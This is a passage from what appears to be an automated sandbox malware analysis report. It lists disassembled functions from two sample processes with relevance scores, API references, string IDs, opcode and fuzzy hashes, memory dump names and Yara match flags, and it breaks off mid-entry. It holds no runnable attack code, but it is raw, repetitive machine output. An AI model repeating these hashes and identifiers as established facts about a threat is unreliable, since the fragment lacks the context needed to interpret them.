                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Bl$l
                                                • API String ID: 3446177414-208461968
                                                • Opcode ID: 550f6c82cf1132d03e1c69ed150fd4425680d4aa38f4b0fd95c4c7ddf826fff0
                                                • Instruction ID: 9919db7f7f5377d4cef55661efa56410c78addbe0183b50b7b6f28cfb743bf48
                                                • Opcode Fuzzy Hash: 550f6c82cf1132d03e1c69ed150fd4425680d4aa38f4b0fd95c4c7ddf826fff0
                                                • Instruction Fuzzy Hash: C5A1B231E003398BEB31DB99C890BAAB7B1BB54304F4540EBD9096B261DB74AEC5CF51
                                                Function 01455DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 01455E34
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: b171b8d23e84820b2923a39571200980b406c949daa5184cb93af291465c8a27
                                                • Instruction ID: 0a5b9d96c795f14fd1715fdf788023c3b3164c284b6ff7f150694846d269298f
                                                • Opcode Fuzzy Hash: b171b8d23e84820b2923a39571200980b406c949daa5184cb93af291465c8a27
                                                • Instruction Fuzzy Hash: ED51597190820697D7E2B71CC91137B3B95EB00750F14C95BECD58E3FBDA34849A9B46
                                                Function 01444C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0$Flst
                                                • API String ID: 0-758220159
                                                • Opcode ID: f7a0be8ffd64bae5639def938f3655a506b6579447d1a68cdc77efd8d3e68335
                                                • Instruction ID: 500bd9db8ea815c6e279d39000834f8c4821428a420472bcee8f74b5a24aa422
                                                • Opcode Fuzzy Hash: f7a0be8ffd64bae5639def938f3655a506b6579447d1a68cdc77efd8d3e68335
                                                • Instruction Fuzzy Hash: EB517CB1A002148BEF26DF99D98476EFBF4FF44758F19802FD0499B261E7709986CB80
                                                Function 0143D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlDebugPrintTimes.NTDLL ref: 0143D959
                                                  • Part of subcall function 01414859: RtlDebugPrintTimes.NTDLL ref: 014148F7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$$
                                                • API String ID: 3446177414-233714265
                                                • Opcode ID: 69cc073dc3ea133ebe532de6be0d28011f08327a9864633d56a065c97ad707e2
                                                • Instruction ID: 5ce765180e8faa4c259237f1c8b6c6d0908e878419424ddb2986ae3e246a56e5
                                                • Opcode Fuzzy Hash: 69cc073dc3ea133ebe532de6be0d28011f08327a9864633d56a065c97ad707e2
                                                • Instruction Fuzzy Hash: CE510371E003469FDB25DFE8C48479EBBB1BF98314FA4401ED4256B3A5D770A94ACB80
                                                Function 0149CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                Download Yara Rule
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0149CFBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID: @$@4Qw@4Qw
                                                • API String ID: 4062629308-2383119779
                                                • Opcode ID: 456481d580fa7d10a130be608786c36bb9d63d3ef5673f61f1b3af12a625ee80
                                                • Instruction ID: f58b217cf8a9f07be4a8b15b12d6d4fd122ed326f36b288edb49d654dd38b605
                                                • Opcode Fuzzy Hash: 456481d580fa7d10a130be608786c36bb9d63d3ef5673f61f1b3af12a625ee80
                                                • Instruction Fuzzy Hash: 81419EB5D00225DFCB229FDAC840AAEBBB8BF65B14F01402FE914DF264E7749841CB51
                                                Function 0148FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $
                                                • API String ID: 3446177414-3993045852
                                                • Opcode ID: 345d6e7057a9092d98b82334a2ff00b013686d4673767a541bc9cbbffe3dd2f3
                                                • Instruction ID: 71044b2bd0503a5eac0b5a80a3bb8113b8203617a2825056a6305c7576029535
                                                • Opcode Fuzzy Hash: 345d6e7057a9092d98b82334a2ff00b013686d4673767a541bc9cbbffe3dd2f3
                                                • Instruction Fuzzy Hash: D641AE75A00209AFDB12EF99C880AEEBBB5FF48714F14001AEA04A7351D771D949DBA0
                                                Function 0140DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0$0
                                                • API String ID: 3446177414-203156872
                                                • Opcode ID: 132a29243731b885ee4d60d8535b70f780503c0279ec477f50bcfcbd18a6dc0c
                                                • Instruction ID: d56021f42bfa1431dab319a581d99bb7be1e06a7e6200c3bf07331c06fc51203
                                                • Opcode Fuzzy Hash: 132a29243731b885ee4d60d8535b70f780503c0279ec477f50bcfcbd18a6dc0c
                                                • Instruction Fuzzy Hash: 9B416DB1A087069FD311CF69C494A17BBE5BB88314F04893EF988DB351D771E909CB96

                                                Executed Functions

                                                Function 03308856 Relevance: 40.4, Strings: 32, Instructions: 435COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$%A$.$.^$/$5?$6$$7$;$@$A*$F$G$H:$I$K$Q$T9$U$VW$_;$e$g$lP$v$w$x$z${V$&$O$e
                                                • API String ID: 0-2514921418
                                                • Opcode ID: c8c5e64a8d66f23500375c3eb5a2c91611c67c0cfcb5725f0872275182252a9c
                                                • Instruction ID: b0315b8073137c10cd56d9e17340fc681071a6f60350824f87575d0bcb1ce3b4
                                                • Opcode Fuzzy Hash: c8c5e64a8d66f23500375c3eb5a2c91611c67c0cfcb5725f0872275182252a9c
                                                • Instruction Fuzzy Hash: BE42AFB0D05268CBEB24CF45C9A8BDDBBB5BB45308F1085D9C10A7B291C7BA5AC9CF51
                                                Function 033166AA Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 6$O$S$\$s
                                                • API String ID: 0-3854637164
                                                • Opcode ID: b8e89f001162c57be3c0f003c002d9e8674848afa96a1239a598b3db142f3f93
                                                • Instruction ID: 63f622e04515d74effc3aab56bb295c773faa52cedaeb5bab58de03bc37cafc0
                                                • Opcode Fuzzy Hash: b8e89f001162c57be3c0f003c002d9e8674848afa96a1239a598b3db142f3f93
                                                • Instruction Fuzzy Hash: 1A51C172D00218ABDB14DFD4DCC9FEEB77CEF84311F048299ED086A140E7B15A648BA1
                                                Function 03324D1A Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: At
                                                • API String ID: 0-4292073886
                                                • Opcode ID: 807350a63ef937067135302187a546052cc118348ae942fe76958c4688f33b04
                                                • Instruction ID: d943d797c42beae01b97daddbb8ccae9e0bdfd24c57d123ea2e0ec9dc917e36f
                                                • Opcode Fuzzy Hash: 807350a63ef937067135302187a546052cc118348ae942fe76958c4688f33b04
                                                • Instruction Fuzzy Hash: C71115B6D0121CAF8B04DFA9D9409EFBBF9EF48210F04466AE915E7200E7705A408FA1
                                                Function 03302300 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edd7cf63caa0cc9bd5c5d4e9faaceab2a41be13f42484a8fe7e4e1f2963ead50
                                                • Instruction ID: c8f296f0ef9e750427180aabb6c561cc7856d235a048eff24c6fe857c49af429
                                                • Opcode Fuzzy Hash: edd7cf63caa0cc9bd5c5d4e9faaceab2a41be13f42484a8fe7e4e1f2963ead50
                                                • Instruction Fuzzy Hash: 8A411AB1D11229AFDB04CF99C885AEEBFBCFF49710F10455AF914E6241E3B19A41CBA4
                                                Function 0332712A Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 884b13e1b9f7bab7cde63668ee360814c721c70254693dc243bc933071bd9cd8
                                                • Instruction ID: d6e87d22216051c4dd58fea4d993da2287a60a658ab7cc3048edf724d9ecd0dc
                                                • Opcode Fuzzy Hash: 884b13e1b9f7bab7cde63668ee360814c721c70254693dc243bc933071bd9cd8
                                                • Instruction Fuzzy Hash: 9A310DB5A00658AFDB14DF98CC81EEFB7B9EF89700F108259F919A7240D774A911CFA1
                                                Function 03327AEA Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2264e9067f9273a43b14f95d1487ddb7738a4ff627cf96d1acbf95861701b3f4
                                                • Instruction ID: a115a95eeb3ff03403c60cd39524c4608af3127483690737aa0692680c146d88
                                                • Opcode Fuzzy Hash: 2264e9067f9273a43b14f95d1487ddb7738a4ff627cf96d1acbf95861701b3f4
                                                • Instruction Fuzzy Hash: 83213BB5A00618AFDB14DF98DC81FAFB7A8EF89700F008149F9199B240D7706911CFA1
                                                Function 033164EA Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f8fe3618703aad9e6abb931d17b4a70c689a88376c7b52a06207cc9029f58ce5
                                                • Instruction ID: 74987fe0fcf89affac3bb04ac469a98574d7a49ffd85fdaee885f3c4c6da7355
                                                • Opcode Fuzzy Hash: f8fe3618703aad9e6abb931d17b4a70c689a88376c7b52a06207cc9029f58ce5
                                                • Instruction Fuzzy Hash: E711C2B67803147BF320EA558C83FAB375CEB85B50F248014FB08AE2C1E6A4F81146B8
                                                Function 033239DA Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3fbaa8a8f44cced76cdc69419bdf1b5fb8efefb6622a772abd1feb553d8ea06
                                                • Instruction ID: ad8d46a22e461fbcaa110582452cfeaa735bb099f47d4c7c94dd329e5e1cb129
                                                • Opcode Fuzzy Hash: b3fbaa8a8f44cced76cdc69419bdf1b5fb8efefb6622a772abd1feb553d8ea06
                                                • Instruction Fuzzy Hash: 5F1103B6D01218AF8B04DFA9D9419EFB7F9EF88210F14466AE915E7204E7705A548BA0
                                                Function 03326F3A Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0752696f63cd8cf661718b33764bfd2a92305c542ef21ad9ebd3420ec2ac457
                                                • Instruction ID: 9acb1f8fcb88c60870c4661588aac2d46dc9b716f8c196c2b24aeb6a421398c1
                                                • Opcode Fuzzy Hash: e0752696f63cd8cf661718b33764bfd2a92305c542ef21ad9ebd3420ec2ac457
                                                • Instruction Fuzzy Hash: 29118EB59047187FD710DB94CC45FAFBBACEF89700F008549F9186B280E7B069118BA1
                                                Function 03326DBA Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 500380608c6c29eed148fd125e89144604597ed180db69136bbe74afd495da6e
                                                • Instruction ID: 0b58bc01cac7692b9802bc761a7e2f2a2136384c5006e1362406ebe70f7dafd3
                                                • Opcode Fuzzy Hash: 500380608c6c29eed148fd125e89144604597ed180db69136bbe74afd495da6e
                                                • Instruction Fuzzy Hash: DD118E75A00758BFD710DB98CC45FAFB7ACEF85700F008549F9185B240E7B06911CBA1
                                                Function 03327E6A Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                • Instruction ID: 4732c24214cc106262a7514ac77138906bf6cd317cb095bece3ba4300596f505
                                                • Opcode Fuzzy Hash: 4cd4280d41d9b0ffbbefb1fd3d98d1d2ca84c7f99bb972688164bbfd40e7bfce
                                                • Instruction Fuzzy Hash: 3601C0B2201208BFDB44DE99DC90EEB77ADEF8C714F108208FA09A7240D630E8518BA4
                                                Function 0332394A Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15eed0700824272cbed1b1ee8f01b86248a1654018556e985f17cbedec426a76
                                                • Instruction ID: 513e87f01d1e6a0daa1d12deb0d0875ff3a8ccb00ecd81e40e597f98011787fd
                                                • Opcode Fuzzy Hash: 15eed0700824272cbed1b1ee8f01b86248a1654018556e985f17cbedec426a76
                                                • Instruction Fuzzy Hash: C601EDB6C11219AFCB44DFE9D9809EEFBF9AB08200F14466EE915F7200F7705A048FA1
                                                Function 0330244E Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b44610ca1478e1b6d745acd21700ce6e4c4dd39e1c9f0f1095c6d61ab23b8a00
                                                • Instruction ID: 8229bdbbf764c42c9b101debb0fa21b93e5e47247dedd155bbc19279875d051b
                                                • Opcode Fuzzy Hash: b44610ca1478e1b6d745acd21700ce6e4c4dd39e1c9f0f1095c6d61ab23b8a00
                                                • Instruction Fuzzy Hash: 47F04073A142131BE7248A2DAC88B8BFBDCEB84234F280722FC58DA181D37194518790
                                                Function 0332703A Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 32c5c2cf4d87909e97c69abf1ade004c13c237691f2f7817a1ff01f0728da7e7
                                                • Instruction ID: d472380ec097c369d1b6c0485926e58667d3c0131388833bd09d74f4aca5a051
                                                • Opcode Fuzzy Hash: 32c5c2cf4d87909e97c69abf1ade004c13c237691f2f7817a1ff01f0728da7e7
                                                • Instruction Fuzzy Hash: E0F012B5210615BFCB10DF99DC91EEB77ADEF88710F004519F91897241D670B9518BF0
                                                Function 0331660A Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 061bf1b2222f06f666ad7ef0efabbb06efe809c570bb92f9aad6666bc0850f42
                                                • Instruction ID: 1346a84b41a7fac94a57797c33dc48ce06b46a60db26aa9557380f3f79539a94
                                                • Opcode Fuzzy Hash: 061bf1b2222f06f666ad7ef0efabbb06efe809c570bb92f9aad6666bc0850f42
                                                • Instruction Fuzzy Hash: 6FF08271C15209EBDB14CFA4D882BDDBBB8EB44324F1083AEE8299B2C0D63497618781
                                                Function 03327D8A Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction ID: b75ed368a3e60d345ab5944b4b541216bdad7b2c67c47906c944637f26158a69
                                                • Opcode Fuzzy Hash: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction Fuzzy Hash: 76E06DB52003187BD610EF58DC45EEB77ADEFC9710F404519F908AB241DA70B8518BB5
                                                Function 03329C2A Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e6337151cd32d136859f64801a72e05f170ad640368003db070b3d6c8777738
                                                • Instruction ID: 444e3bb92c972bfec17e2253c06cf92846908194d03d942c2121fc9c7c6691d0
                                                • Opcode Fuzzy Hash: 3e6337151cd32d136859f64801a72e05f170ad640368003db070b3d6c8777738
                                                • Instruction Fuzzy Hash: EBE08636A0033437C224A5899C45F57BB9CCFC3E60F090124FE08AB340E660E91142E5
                                                Function 03327A4A Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction ID: cd90b82449a44396f7e287c24791d970e1ec49e52b04c6bf3b1265fb614c1d41
                                                • Opcode Fuzzy Hash: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction Fuzzy Hash: AAE04F756402147BD520EB59DC41FABB79CEBC5B10F008515FA09AB240CAB1B9118BA0
                                                Function 03309294 Relevance: .0, Instructions: 5COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e96378fa17382bedff40c33f1e0709699db874266609bc1f1b938e2e6b777b70
                                                • Instruction ID: d4a2f8b1e56aaaaf9d89b21c14db53133cb0014f2580d56b50990f423e7bbed4
                                                • Opcode Fuzzy Hash: e96378fa17382bedff40c33f1e0709699db874266609bc1f1b938e2e6b777b70
                                                • Instruction Fuzzy Hash:

                                                Non-executed Functions

                                                Function 033088D4 Relevance: 38.9, Strings: 31, Instructions: 152COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
